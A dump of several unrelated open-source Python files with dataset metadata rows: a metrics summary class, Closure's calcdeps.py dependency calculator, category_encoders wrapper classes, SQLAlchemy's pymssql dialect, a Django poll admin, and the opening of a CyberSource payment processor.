values in the dictionaries.
"""
def __init__(self):
self._summaries = collections.defaultdict(Summary)
def add(self, d):
"""Adds a dictionary of scalars.
Args:
d (dict): Dictionary of scalars to accumulate. Only elements of
scalars, zero-dimensional arrays, and variables of
zero-dimensional arrays are accumulated. When the value
is a tuple, the second element is interpreted as a weight.
"""
summaries = self._summaries
for k, v in six.iteritems(d):
w = 1
if isinstance(v, tuple):
w = v[1]
v = v[0]
if isinstance(w, variable.Variable):
w = w.array
if not numpy.isscalar(w) and not getattr(w, 'ndim', -1) == 0:
raise ValueError(
'Given weight to {} was not scalar.'.format(k))
if isinstance(v, variable.Variable):
v = v.array
if numpy.isscalar(v) or getattr(v, 'ndim', -1) == 0:
summaries[k].add(v, weight=w)
def compute_mean(self):
"""Creates a dictionary of mean values.
It returns a single dictionary that holds a mean value for each entry
added to the summary.
Returns:
dict: Dictionary of mean values.
"""
return {name: summary.compute_mean()
for name, summary in six.iteritems(self._summaries)}
def make_statistics(self):
"""Creates a dictionary of statistics.
It returns a single dictionary that holds mean and standard deviation
values for every entry added to the summary. For an entry of name
``'key'``, these values are added to the dictionary by names ``'key'``
and ``'key.std'``, respectively.
Returns:
dict: Dictionary of statistics of all entries.
"""
stats = {}
for name, summary in six.iteritems(self._summaries):
mean, std = summary.make_statistics()
stats[name] = mean
stats[name + '.std'] = std
return stats
def serialize(self, serializer):
if isinstance(serializer, serializer_module.Serializer):
names = list(self._summaries.keys())
serializer('_names', json.dumps(names))
for index, name in enumerate(names):
self._summaries[name].serialize(
serializer['_summaries'][str(index)])
else:
self._summaries.clear()
try:
names = json.loads(serializer('_names', ''))
except KeyError:
warnings.warn('The names of statistics are not saved.')
return
for index, name in enumerate(names):
self._summaries[name].serialize(
serializer['_summaries'][str(index)])
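# --- Editor's illustrative sketch (not part of the original module) ---
# Minimal usage of DictSummary: accumulate two observation dicts (for example,
# as produced by a Reporter) and read back per-key statistics.
def _example_dict_summary_usage():
    summary = DictSummary()
    summary.add({'main/loss': 0.5, 'main/accuracy': 0.8})
    summary.add({'main/loss': 0.3, 'main/accuracy': 0.9})
    means = summary.compute_mean()     # {'main/loss': 0.4, 'main/accuracy': 0.85}
    stats = summary.make_statistics()  # also contains 'main/loss.std', 'main/accuracy.std'
    return means, stats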
| mit | -8,370,592,927,157,155,000 | 32.928571 | 79 | 0.603368 | false |
foxbitbr/testnet | jsdev/closure-library/closure/bin/calcdeps.py | 71 | 18576 | #!/usr/bin/env python
#
# Copyright 2006 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Calculates JavaScript dependencies without requiring Google's build system.
This tool is deprecated and is provided for legacy users.
See build/closurebuilder.py and build/depswriter.py for the current tools.
It iterates over a number of search paths and builds a dependency tree. With
the inputs provided, it walks the dependency tree and outputs all the files
required for compilation.
"""
try:
import distutils.version
except ImportError:
# distutils is not available in all environments
distutils = None
import logging
import optparse
import os
import re
import subprocess
import sys
_BASE_REGEX_STRING = r'^\s*goog\.%s\(\s*[\'"](.+)[\'"]\s*\)'
req_regex = re.compile(_BASE_REGEX_STRING % 'require')
prov_regex = re.compile(_BASE_REGEX_STRING % 'provide')
ns_regex = re.compile(r'^ns:((\w+\.)*(\w+))$')
version_regex = re.compile(r'[\.0-9]+')
def IsValidFile(ref):
"""Returns true if the provided reference is a file and exists."""
return os.path.isfile(ref)
def IsJsFile(ref):
"""Returns true if the provided reference is a Javascript file."""
return ref.endswith('.js')
def IsNamespace(ref):
"""Returns true if the provided reference is a namespace."""
return re.match(ns_regex, ref) is not None
def IsDirectory(ref):
"""Returns true if the provided reference is a directory."""
return os.path.isdir(ref)
def ExpandDirectories(refs):
"""Expands any directory references into inputs.
Description:
Looks for any directories in the provided references. Found directories
are recursively searched for .js files, which are then added to the result
list.
Args:
refs: a list of references such as files, directories, and namespaces
Returns:
A list of references with directories removed and replaced by any
.js files that are found in them. Also, the paths will be normalized.
"""
result = []
for ref in refs:
if IsDirectory(ref):
# Disable 'Unused variable' for subdirs
# pylint: disable=unused-variable
for (directory, subdirs, filenames) in os.walk(ref):
for filename in filenames:
if IsJsFile(filename):
result.append(os.path.join(directory, filename))
else:
result.append(ref)
return map(os.path.normpath, result)
class DependencyInfo(object):
"""Represents a dependency that is used to build and walk a tree."""
def __init__(self, filename):
self.filename = filename
self.provides = []
self.requires = []
def __str__(self):
return '%s Provides: %s Requires: %s' % (self.filename,
repr(self.provides),
repr(self.requires))
def BuildDependenciesFromFiles(files):
"""Build a list of dependencies from a list of files.
Description:
Takes a list of files, extracts their provides and requires, and builds
out a list of dependency objects.
Args:
files: a list of files to be parsed for goog.provides and goog.requires.
Returns:
A list of dependency objects, one for each file in the files argument.
"""
result = []
filenames = set()
for filename in files:
if filename in filenames:
continue
# Python 3 requires the file encoding to be specified
if (sys.version_info[0] < 3):
file_handle = open(filename, 'r')
else:
file_handle = open(filename, 'r', encoding='utf8')
try:
dep = CreateDependencyInfo(filename, file_handle)
result.append(dep)
finally:
file_handle.close()
filenames.add(filename)
return result
def CreateDependencyInfo(filename, source):
"""Create dependency info.
Args:
filename: Filename for source.
source: File-like object containing source.
Returns:
A DependencyInfo object with provides and requires filled.
"""
dep = DependencyInfo(filename)
for line in source:
if re.match(req_regex, line):
dep.requires.append(re.search(req_regex, line).group(1))
if re.match(prov_regex, line):
dep.provides.append(re.search(prov_regex, line).group(1))
return dep
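# --- Editor's illustrative sketch (not part of the original script) ---
# Parsing a small in-memory source; the filename and namespaces are made up.
# Any iterable of lines works because CreateDependencyInfo only iterates them.
def ExampleCreateDependencyInfo():
  source = [
      "goog.provide('app.Main');\n",
      "goog.require('goog.dom');\n",
  ]
  dep = CreateDependencyInfo('app/main.js', source)
  # dep.provides == ['app.Main'], dep.requires == ['goog.dom']
  return dep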
def BuildDependencyHashFromDependencies(deps):
"""Builds a hash for searching dependencies by the namespaces they provide.
Description:
Dependency objects can provide multiple namespaces. This method enumerates
the provides of each dependency and adds them to a hash that can be used
to easily resolve a given dependency by a namespace it provides.
Args:
deps: a list of dependency objects used to build the hash.
Raises:
    Exception: If multiple files try to provide the same namespace.
Returns:
A hash table { namespace: dependency } that can be used to resolve a
dependency by a namespace it provides.
"""
dep_hash = {}
for dep in deps:
for provide in dep.provides:
if provide in dep_hash:
raise Exception('Duplicate provide (%s) in (%s, %s)' % (
provide,
dep_hash[provide].filename,
dep.filename))
dep_hash[provide] = dep
return dep_hash
def CalculateDependencies(paths, inputs):
"""Calculates the dependencies for given inputs.
Description:
This method takes a list of paths (files, directories) and builds a
searchable data structure based on the namespaces that each .js file
provides. It then parses through each input, resolving dependencies
against this data structure. The final output is a list of files,
including the inputs, that represent all of the code that is needed to
compile the given inputs.
Args:
paths: the references (files, directories) that are used to build the
dependency hash.
inputs: the inputs (files, directories, namespaces) that have dependencies
that need to be calculated.
Raises:
Exception: if a provided input is invalid.
Returns:
A list of all files, including inputs, that are needed to compile the given
inputs.
"""
deps = BuildDependenciesFromFiles(paths + inputs)
search_hash = BuildDependencyHashFromDependencies(deps)
result_list = []
seen_list = []
for input_file in inputs:
if IsNamespace(input_file):
namespace = re.search(ns_regex, input_file).group(1)
if namespace not in search_hash:
raise Exception('Invalid namespace (%s)' % namespace)
input_file = search_hash[namespace].filename
if not IsValidFile(input_file) or not IsJsFile(input_file):
raise Exception('Invalid file (%s)' % input_file)
seen_list.append(input_file)
file_handle = open(input_file, 'r')
try:
for line in file_handle:
if re.match(req_regex, line):
require = re.search(req_regex, line).group(1)
ResolveDependencies(require, search_hash, result_list, seen_list)
finally:
file_handle.close()
result_list.append(input_file)
# All files depend on base.js, so put it first.
base_js_path = FindClosureBasePath(paths)
if base_js_path:
result_list.insert(0, base_js_path)
else:
logging.warning('Closure Library base.js not found.')
return result_list
def FindClosureBasePath(paths):
"""Given a list of file paths, return Closure base.js path, if any.
Args:
paths: A list of paths.
Returns:
The path to Closure's base.js file including filename, if found.
"""
for path in paths:
pathname, filename = os.path.split(path)
if filename == 'base.js':
f = open(path)
is_base = False
# Sanity check that this is the Closure base file. Check that this
# is where goog is defined. This is determined by the @provideGoog
# flag.
for line in f:
if '@provideGoog' in line:
is_base = True
break
f.close()
if is_base:
return path
def ResolveDependencies(require, search_hash, result_list, seen_list):
"""Takes a given requirement and resolves all of the dependencies for it.
Description:
A given requirement may require other dependencies. This method
recursively resolves all dependencies for the given requirement.
Raises:
Exception: when require does not exist in the search_hash.
Args:
require: the namespace to resolve dependencies for.
search_hash: the data structure used for resolving dependencies.
result_list: a list of filenames that have been calculated as dependencies.
This variable is the output for this function.
seen_list: a list of filenames that have been 'seen'. This is required
for the dependency->dependant ordering.
"""
if require not in search_hash:
raise Exception('Missing provider for (%s)' % require)
dep = search_hash[require]
if not dep.filename in seen_list:
seen_list.append(dep.filename)
for sub_require in dep.requires:
ResolveDependencies(sub_require, search_hash, result_list, seen_list)
result_list.append(dep.filename)
def GetDepsLine(dep, base_path):
"""Returns a JS string for a dependency statement in the deps.js file.
Args:
dep: The dependency that we're printing.
base_path: The path to Closure's base.js including filename.
"""
return 'goog.addDependency("%s", %s, %s);' % (
GetRelpath(dep.filename, base_path), dep.provides, dep.requires)
def GetRelpath(path, start):
"""Return a relative path to |path| from |start|."""
# NOTE: Python 2.6 provides os.path.relpath, which has almost the same
# functionality as this function. Since we want to support 2.4, we have
# to implement it manually. :(
path_list = os.path.abspath(os.path.normpath(path)).split(os.sep)
start_list = os.path.abspath(
os.path.normpath(os.path.dirname(start))).split(os.sep)
common_prefix_count = 0
for i in range(0, min(len(path_list), len(start_list))):
if path_list[i] != start_list[i]:
break
common_prefix_count += 1
# Always use forward slashes, because this will get expanded to a url,
# not a file path.
return '/'.join(['..'] * (len(start_list) - common_prefix_count) +
path_list[common_prefix_count:])
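# --- Editor's illustrative sketch (not part of the original script) ---
# GetRelpath strips the common path prefix and joins with forward slashes; the
# absolute paths below are made up.
def ExampleGetRelpath():
  # On a POSIX filesystem this returns '../app/main.js', since only '/closure'
  # is shared with the directory containing base.js.
  return GetRelpath('/closure/app/main.js', '/closure/goog/base.js')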
def PrintLine(msg, out):
out.write(msg)
out.write('\n')
def PrintDeps(source_paths, deps, out):
"""Print out a deps.js file from a list of source paths.
Args:
source_paths: Paths that we should generate dependency info for.
deps: Paths that provide dependency info. Their dependency info should
not appear in the deps file.
out: The output file.
Returns:
True on success, false if it was unable to find the base path
to generate deps relative to.
"""
base_path = FindClosureBasePath(source_paths + deps)
if not base_path:
return False
PrintLine('// This file was autogenerated by calcdeps.py', out)
excludesSet = set(deps)
for dep in BuildDependenciesFromFiles(source_paths + deps):
if not dep.filename in excludesSet:
PrintLine(GetDepsLine(dep, base_path), out)
return True
def PrintScript(source_paths, out):
for index, dep in enumerate(source_paths):
PrintLine('// Input %d' % index, out)
f = open(dep, 'r')
PrintLine(f.read(), out)
f.close()
def GetJavaVersion():
"""Returns the string for the current version of Java installed."""
proc = subprocess.Popen(['java', '-version'], stderr=subprocess.PIPE)
proc.wait()
version_line = proc.stderr.read().splitlines()[0]
return version_regex.search(version_line.decode('utf-8')).group()
def FilterByExcludes(options, files):
"""Filters the given files by the exlusions specified at the command line.
Args:
options: The flags to calcdeps.
files: The files to filter.
Returns:
A list of files.
"""
excludes = []
if options.excludes:
excludes = ExpandDirectories(options.excludes)
excludesSet = set(excludes)
return [i for i in files if not i in excludesSet]
def GetPathsFromOptions(options):
"""Generates the path files from flag options.
Args:
options: The flags to calcdeps.
Returns:
A list of files in the specified paths. (strings).
"""
search_paths = options.paths
if not search_paths:
search_paths = ['.'] # Add default folder if no path is specified.
search_paths = ExpandDirectories(search_paths)
return FilterByExcludes(options, search_paths)
def GetInputsFromOptions(options):
"""Generates the inputs from flag options.
Args:
options: The flags to calcdeps.
Returns:
A list of inputs (strings).
"""
inputs = options.inputs
if not inputs: # Parse stdin
logging.info('No inputs specified. Reading from stdin...')
inputs = filter(None, [line.strip('\n') for line in sys.stdin.readlines()])
logging.info('Scanning files...')
inputs = ExpandDirectories(inputs)
return FilterByExcludes(options, inputs)
def Compile(compiler_jar_path, source_paths, out, flags=None):
"""Prepares command-line call to Closure compiler.
Args:
compiler_jar_path: Path to the Closure compiler .jar file.
source_paths: Source paths to build, in order.
flags: A list of additional flags to pass on to Closure compiler.
"""
args = ['java', '-jar', compiler_jar_path]
for path in source_paths:
args += ['--js', path]
if flags:
args += flags
logging.info('Compiling with the following command: %s', ' '.join(args))
proc = subprocess.Popen(args, stdout=subprocess.PIPE)
(stdoutdata, stderrdata) = proc.communicate()
if proc.returncode != 0:
logging.error('JavaScript compilation failed.')
sys.exit(1)
else:
out.write(stdoutdata.decode('utf-8'))
def main():
"""The entrypoint for this script."""
logging.basicConfig(format='calcdeps.py: %(message)s', level=logging.INFO)
usage = 'usage: %prog [options] arg'
parser = optparse.OptionParser(usage)
parser.add_option('-i',
'--input',
dest='inputs',
action='append',
help='The inputs to calculate dependencies for. Valid '
'values can be files, directories, or namespaces '
'(ns:goog.net.XhrIo). Only relevant to "list" and '
'"script" output.')
parser.add_option('-p',
'--path',
dest='paths',
action='append',
help='The paths that should be traversed to build the '
'dependencies.')
parser.add_option('-d',
'--dep',
dest='deps',
action='append',
help='Directories or files that should be traversed to '
'find required dependencies for the deps file. '
'Does not generate dependency information for names '
'provided by these files. Only useful in "deps" mode.')
parser.add_option('-e',
'--exclude',
dest='excludes',
action='append',
help='Files or directories to exclude from the --path '
'and --input flags')
parser.add_option('-o',
'--output_mode',
dest='output_mode',
action='store',
default='list',
help='The type of output to generate from this script. '
'Options are "list" for a list of filenames, "script" '
'for a single script containing the contents of all the '
                    'files, "deps" to generate a deps.js file for all '
'paths, or "compiled" to produce compiled output with '
'the Closure compiler.')
parser.add_option('-c',
'--compiler_jar',
dest='compiler_jar',
action='store',
help='The location of the Closure compiler .jar file.')
parser.add_option('-f',
'--compiler_flag',
                    '--compiler_flags',  # for backwards compatibility
dest='compiler_flags',
action='append',
help='Additional flag to pass to the Closure compiler. '
'May be specified multiple times to pass multiple flags.')
parser.add_option('--output_file',
dest='output_file',
action='store',
help=('If specified, write output to this path instead of '
'writing to standard output.'))
(options, args) = parser.parse_args()
search_paths = GetPathsFromOptions(options)
if options.output_file:
out = open(options.output_file, 'w')
else:
out = sys.stdout
if options.output_mode == 'deps':
result = PrintDeps(search_paths, ExpandDirectories(options.deps or []), out)
if not result:
logging.error('Could not find Closure Library in the specified paths')
sys.exit(1)
return
inputs = GetInputsFromOptions(options)
logging.info('Finding Closure dependencies...')
deps = CalculateDependencies(search_paths, inputs)
output_mode = options.output_mode
if output_mode == 'script':
PrintScript(deps, out)
elif output_mode == 'list':
# Just print out a dep per line
for dep in deps:
PrintLine(dep, out)
elif output_mode == 'compiled':
# Make sure a .jar is specified.
if not options.compiler_jar:
logging.error('--compiler_jar flag must be specified if --output is '
'"compiled"')
sys.exit(1)
# User friendly version check.
if distutils and not (distutils.version.LooseVersion(GetJavaVersion()) >
distutils.version.LooseVersion('1.6')):
logging.error('Closure Compiler requires Java 1.6 or higher.')
logging.error('Please visit http://www.java.com/getjava')
sys.exit(1)
Compile(options.compiler_jar, deps, out, options.compiler_flags)
else:
logging.error('Invalid value for --output flag.')
sys.exit(1)
if __name__ == '__main__':
main()
| gpl-3.0 | 7,585,227,829,057,054,000 | 30.484746 | 80 | 0.652132 | false |
scikit-learn-contrib/categorical-encoding | category_encoders/wrapper.py | 1 | 11845 | import copy
from category_encoders import utils
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.model_selection import StratifiedKFold
import category_encoders as encoders
import pandas as pd
import numpy as np
class PolynomialWrapper(BaseEstimator, TransformerMixin):
"""Extend supervised encoders to n-class labels, where n >= 2.
The label can be numerical (e.g.: 0, 1, 2, 3,...,n), string or categorical (pandas.Categorical).
The label is first encoded into n-1 binary columns. Subsequently, the inner supervised encoder
is executed for each binarized label.
The names of the encoded features are suffixed with underscore and the corresponding class name
(edge scenarios like 'dog'+'cat_frog' vs. 'dog_cat'+'frog' are not currently handled).
The implementation is experimental and the API may change in the future.
The order of the returned features may change in the future.
Parameters
----------
feature_encoder: Object
an instance of a supervised encoder.
Example
-------
>>> from category_encoders import *
>>> import pandas as pd
>>> from sklearn.datasets import load_boston
>>> from category_encoders.wrapper import PolynomialWrapper
>>> bunch = load_boston()
>>> y = bunch.target
>>> y = (y/10).round().astype(int) # we create 6 artificial classes
>>> X = pd.DataFrame(bunch.data, columns=bunch.feature_names)
>>> enc = TargetEncoder(cols=['CHAS', 'RAD'])
>>> wrapper = PolynomialWrapper(enc)
>>> encoded =wrapper.fit_transform(X, y)
>>> print(encoded.info())
"""
def __init__(self, feature_encoder):
self.feature_encoder = feature_encoder
self.feature_encoders = {}
self.label_encoder = None
def fit(self, X, y, **kwargs):
# unite the input into pandas types
X = utils.convert_input(X)
y = utils.convert_input(y)
y.columns = ['target']
# apply one-hot-encoder on the label
self.label_encoder = encoders.OneHotEncoder(handle_missing='error', handle_unknown='error', cols=['target'], drop_invariant=True,
use_cat_names=True)
labels = self.label_encoder.fit_transform(y)
labels.columns = [column[7:] for column in labels.columns]
labels = labels.iloc[:, 1:] # drop one label
# train the feature encoders
for class_name, label in labels.iteritems():
self.feature_encoders[class_name] = copy.deepcopy(self.feature_encoder).fit(X, label)
def transform(self, X):
# unite the input into pandas types
X = utils.convert_input(X)
# initialization
encoded = None
feature_encoder = None
all_new_features = pd.DataFrame()
# transform the features
for class_name, feature_encoder in self.feature_encoders.items():
encoded = feature_encoder.transform(X)
# decorate the encoded features with the label class suffix
new_features = encoded[feature_encoder.cols]
new_features.columns = [str(column) + '_' + class_name for column in new_features.columns]
all_new_features = pd.concat((all_new_features, new_features), axis=1)
# add features that were not encoded
result = pd.concat((encoded[encoded.columns[~encoded.columns.isin(feature_encoder.cols)]], all_new_features), axis=1)
return result
def fit_transform(self, X, y=None, **fit_params):
# When we are training the feature encoders, we have to use fit_transform() method on the features.
# unite the input into pandas types
X = utils.convert_input(X)
y = utils.convert_input(y)
y.columns = ['target']
# apply one-hot-encoder on the label
self.label_encoder = encoders.OneHotEncoder(handle_missing='error', handle_unknown='error', cols=['target'], drop_invariant=True,
use_cat_names=True)
labels = self.label_encoder.fit_transform(y)
labels.columns = [column[7:] for column in labels.columns]
labels = labels.iloc[:, 1:] # drop one label
# initialization of the feature encoders
encoded = None
feature_encoder = None
all_new_features = pd.DataFrame()
# fit_transform the feature encoders
for class_name, label in labels.iteritems():
feature_encoder = copy.deepcopy(self.feature_encoder)
encoded = feature_encoder.fit_transform(X, label)
# decorate the encoded features with the label class suffix
new_features = encoded[feature_encoder.cols]
new_features.columns = [str(column) + '_' + class_name for column in new_features.columns]
all_new_features = pd.concat((all_new_features, new_features), axis=1)
self.feature_encoders[class_name] = feature_encoder
# add features that were not encoded
result = pd.concat((encoded[encoded.columns[~encoded.columns.isin(feature_encoder.cols)]], all_new_features), axis=1)
return result
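# --- Editor's illustrative sketch (not part of the original module) ---
# Typical use of PolynomialWrapper around a supervised encoder: fit on training
# data with a multi-class label, then encode unseen rows. The column list is a
# placeholder; X_train, y_train and X_new are pandas objects supplied by the caller.
def _example_polynomial_wrapper(X_train, y_train, X_new, cols):
    wrapper = PolynomialWrapper(encoders.TargetEncoder(cols=cols))
    X_train_encoded = wrapper.fit_transform(X_train, y_train)
    X_new_encoded = wrapper.transform(X_new)  # columns are suffixed per class label
    return X_train_encoded, X_new_encoded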
class NestedCVWrapper(BaseEstimator, TransformerMixin):
"""
Extends supervised encoders with the nested cross validation on the training data to minimise overfitting.
For a validation or a test set, supervised encoders can be used as follows:
X_train_encoded = encoder.fit_transform(X_train, y_train)
X_valid_encoded = encoder.transform(X_valid)
However, the downstream model will be overfitting to the encoded training data due to target leakage.
Using out-of-fold encodings is an effective way to prevent target leakage. This is equivalent to:
X_train_encoded = np.zeros(X.shape)
for trn, val in kfold.split(X, y):
encoder.fit(X[trn], y[trn])
X_train_encoded[val] = encoder.transform(X[val])
This can be used in place of the "inner folds" as discussed here:
https://sebastianraschka.com/faq/docs/evaluate-a-model.html
See README.md for a list of supervised encoders.
Discussion: Although leave-one-out encoder internally performs leave-one-out cross-validation, it is
actually the most overfitting supervised model in our library. To illustrate the issue, let's imagine we
have a totally unpredictive nominal feature and a perfectly balanced binary label. A supervised encoder
should encode the feature into a constant vector as the feature is unpredictive of the label. But when we
    use leave-one-out cross-validation, the label ratio ceases to be perfectly balanced and the wrong class
label always becomes the majority in the training fold. Leave-one-out encoder returns a seemingly
predictive feature. And the downstream model starts to overfit to the encoded feature. Unfortunately,
even 10-fold cross-validation is not immune to this effect:
http://www.kdd.org/exploration_files/v12-02-4-UR-Perlich.pdf
To decrease the effect, it is recommended to use a low count of the folds. And that is the reason why
this wrapper uses 5 folds by default.
Based on the empirical results, only LeaveOneOutEncoder benefits greatly from this wrapper. The remaining
encoders can be used without this wrapper.
Parameters
----------
feature_encoder: Object
an instance of a supervised encoder.
cv: int or sklearn cv Object
if an int is given, StratifiedKFold is used by default, where the int is the number of folds.
shuffle: boolean, optional
        whether to shuffle each class's samples before splitting into batches. Ignored if a CV method is provided.
random_state: int, RandomState instance or None, optional, default=None
if int, random_state is the seed used by the random number generator. Ignored if a CV method is provided.
Example
-------
>>> from category_encoders import *
>>> from category_encoders.wrapper import NestedCVWrapper
>>> from sklearn.datasets import load_boston
>>> from sklearn.model_selection import GroupKFold, train_test_split
>>> bunch = load_boston()
>>> y = bunch.target
>>> # we create 6 artificial classes and a train/validation/test split
>>> y = (y/10).round().astype(int)
>>> X = pd.DataFrame(bunch.data, columns=bunch.feature_names)
>>> X_train, X_test, y_train, _ = train_test_split(X, y)
>>> X_train, X_valid, y_train, y_valid = train_test_split(X_train, y_train)
>>> # Define the nested CV encoder for a supervised encoder
>>> enc_nested = NestedCVWrapper(TargetEncoder(cols=['CHAS', 'RAD']), random_state=42)
>>> # Encode the X data for train, valid & test
>>> X_train_enc, X_valid_enc, X_test_enc = enc_nested.fit_transform(X_train, y_train, X_test=(X_valid, X_test))
>>> print(X_train_enc.info())
"""
def __init__(self, feature_encoder, cv=5, shuffle=True, random_state=None):
self.feature_encoder = feature_encoder
self.__name__ = feature_encoder.__class__.__name__
if type(cv) == int:
self.cv = StratifiedKFold(n_splits=cv, shuffle=shuffle, random_state=random_state)
else:
self.cv = cv
def fit(self, X, y, **kwargs):
"""
Calls fit on the base feature_encoder without nested cross validation
"""
self.feature_encoder.fit(X, y, **kwargs)
def transform(self, X):
"""
Calls transform on the base feature_encoder without nested cross validation
"""
return self.feature_encoder.transform(X)
def fit_transform(self, X, y=None, X_test=None, groups=None, **fit_params):
"""
Creates unbiased encodings from a supervised encoder as well as infer encodings on a test set
:param X: array-like, shape = [n_samples, n_features]
Training vectors for the supervised encoder, where n_samples is the number of samples
and n_features is the number of features.
:param y: array-like, shape = [n_samples]
Target values for the supervised encoder.
:param X_test, optional: array-like, shape = [m_samples, n_features] or a tuple of array-likes (X_test, X_valid...)
Vectors to be used for inference by an encoder (e.g. test or validation sets) trained on the
full X & y sets. No nested folds are used here
:param groups: Groups to be passed to the cv method, e.g. for GroupKFold
:param fit_params:
:return: array, shape = [n_samples, n_numeric + N]
Transformed values with encoding applied. Returns multiple arrays if X_test is not None
"""
X = utils.convert_input(X)
y = utils.convert_input(y)
# Get out-of-fold encoding for the training data
out_of_fold = np.zeros(X.shape)
for trn_idx, oof_idx in self.cv.split(X, y, groups):
feature_encoder = copy.deepcopy(self.feature_encoder)
feature_encoder.fit(X.iloc[trn_idx], y.iloc[trn_idx])
out_of_fold[oof_idx] = feature_encoder.transform(X.iloc[oof_idx])
out_of_fold = pd.DataFrame(out_of_fold, columns=X.columns)
# Train the encoder on all the training data for testing data
self.feature_encoder = copy.deepcopy(self.feature_encoder)
self.feature_encoder.fit(X, y)
if X_test is None:
return out_of_fold
else:
if type(X_test) == tuple:
encoded_data = (out_of_fold, )
for dataset in X_test:
encoded_data = encoded_data + (self.feature_encoder.transform(dataset), )
return encoded_data
else:
return out_of_fold, self.feature_encoder.transform(X_test)
| bsd-3-clause | -3,160,571,149,759,760,400 | 43.363296 | 137 | 0.651836 | false |
evanma92/routeh | flask/lib/python2.7/site-packages/sqlalchemy/dialects/mssql/pymssql.py | 21 | 2968 | # mssql/pymssql.py
# Copyright (C) 2005-2015 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: mssql+pymssql
:name: pymssql
:dbapi: pymssql
:connectstring: mssql+pymssql://<username>:<password>@<freetds_name>?\
charset=utf8
:url: http://pymssql.org/
pymssql is a Python module that provides a Python DBAPI interface around
`FreeTDS <http://www.freetds.org/>`_. Compatible builds are available for
Linux, MacOSX and Windows platforms.
"""
from .base import MSDialect
from ... import types as sqltypes, util, processors
import re
class _MSNumeric_pymssql(sqltypes.Numeric):
def result_processor(self, dialect, type_):
if not self.asdecimal:
return processors.to_float
else:
return sqltypes.Numeric.result_processor(self, dialect, type_)
class MSDialect_pymssql(MSDialect):
supports_sane_rowcount = False
driver = 'pymssql'
colspecs = util.update_copy(
MSDialect.colspecs,
{
sqltypes.Numeric: _MSNumeric_pymssql,
sqltypes.Float: sqltypes.Float,
}
)
@classmethod
def dbapi(cls):
module = __import__('pymssql')
        # pymssql doesn't have a Binary method; we use string
# TODO: monkeypatching here is less than ideal
module.Binary = lambda x: x if hasattr(x, 'decode') else str(x)
client_ver = tuple(int(x) for x in module.__version__.split("."))
if client_ver < (1, ):
util.warn("The pymssql dialect expects at least "
"the 1.0 series of the pymssql DBAPI.")
return module
def __init__(self, **params):
super(MSDialect_pymssql, self).__init__(**params)
self.use_scope_identity = True
def _get_server_version_info(self, connection):
vers = connection.scalar("select @@version")
m = re.match(
r"Microsoft .*? - (\d+).(\d+).(\d+).(\d+)", vers)
if m:
return tuple(int(x) for x in m.group(1, 2, 3, 4))
else:
return None
def create_connect_args(self, url):
opts = url.translate_connect_args(username='user')
opts.update(url.query)
port = opts.pop('port', None)
if port and 'host' in opts:
opts['host'] = "%s:%s" % (opts['host'], port)
return [[], opts]
def is_disconnect(self, e, connection, cursor):
for msg in (
"Adaptive Server connection timed out",
"Net-Lib error during Connection reset by peer",
"message 20003", # connection timeout
"Error 10054",
"Not connected to any MS SQL server",
"Connection is closed"
):
if msg in str(e):
return True
else:
return False
dialect = MSDialect_pymssql
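# --- Editor's note (illustrative, not part of the original module) ---
# The dialect is normally reached through a SQLAlchemy URL of the form shown in
# the module docstring; the credentials, host alias and database name below are
# placeholders:
#     engine = sqlalchemy.create_engine(
#         "mssql+pymssql://scott:tiger@freetds_name/mydb?charset=utf8")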
| bsd-3-clause | -1,464,268,305,426,568,400 | 30.574468 | 74 | 0.598383 | false |
lafranceinsoumise/api-django | agir/polls/admin.py | 1 | 1207 | from django import forms
from django.contrib import admin
from django.utils.html import format_html
from django.utils.translation import ugettext as _
from agir.api.admin import admin_site
from agir.lib.form_fields import AdminJsonWidget, RichEditorWidget
from agir.lib.models import DescriptionField
from .models import Poll, PollOption
from agir.lib.utils import front_url
class PollOptionInline(admin.TabularInline):
model = PollOption
extra = 1
class PollAdminForm(forms.ModelForm):
class Meta:
widgets = {"rules": AdminJsonWidget()}
@admin.register(Poll, site=admin_site)
class PollAdmin(admin.ModelAdmin):
form = PollAdminForm
inlines = [PollOptionInline]
list_display = ("title", "start", "end")
fields = [
"title",
"link",
"description",
"confirmation_note",
"start",
"end",
"rules",
"tags",
]
readonly_fields = ["link"]
def link(self, object):
if object.pk:
return format_html(
'<a href="{url}">{text}</a>',
url=front_url("participate_poll", args=[object.pk]),
text=_("Voir la consultation"),
)
| agpl-3.0 | 7,769,119,875,542,626,000 | 23.632653 | 68 | 0.628003 | false |
eduNEXT/edunext-ecommerce | ecommerce/extensions/payment/processors/cybersource.py | 1 | 24294 | """ CyberSource payment processing. """
from __future__ import absolute_import, unicode_literals
import base64
import datetime
import json
import logging
import uuid
from decimal import Decimal
import six
from django.conf import settings
from django.urls import reverse
from oscar.apps.payment.exceptions import GatewayError, TransactionDeclined, UserCancelled
from oscar.core.loading import get_class, get_model
from zeep import Client
from zeep.helpers import serialize_object
from zeep.wsse import UsernameToken
from ecommerce.core.constants import ISO_8601_FORMAT
from ecommerce.core.url_utils import get_ecommerce_url
from ecommerce.extensions.checkout.utils import get_receipt_page_url
from ecommerce.extensions.payment.constants import APPLE_PAY_CYBERSOURCE_CARD_TYPE_MAP, CYBERSOURCE_CARD_TYPE_MAP
from ecommerce.extensions.payment.exceptions import (
AuthorizationError,
DuplicateReferenceNumber,
ExcessivePaymentForOrderError,
InvalidCybersourceDecision,
InvalidSignatureError,
PartialAuthorizationError,
PCIViolation,
ProcessorMisconfiguredError,
RedundantPaymentNotificationError
)
from ecommerce.extensions.payment.helpers import sign
from ecommerce.extensions.payment.processors import (
ApplePayMixin,
BaseClientSidePaymentProcessor,
HandledProcessorResponse
)
from ecommerce.extensions.payment.utils import clean_field_value, get_basket_program_uuid
logger = logging.getLogger(__name__)
Order = get_model('order', 'Order')
OrderNumberGenerator = get_class('order.utils', 'OrderNumberGenerator')
PaymentProcessorResponse = get_model('payment', 'PaymentProcessorResponse')
class Cybersource(ApplePayMixin, BaseClientSidePaymentProcessor):
"""
CyberSource Secure Acceptance Web/Mobile (February 2015)
For reference, see
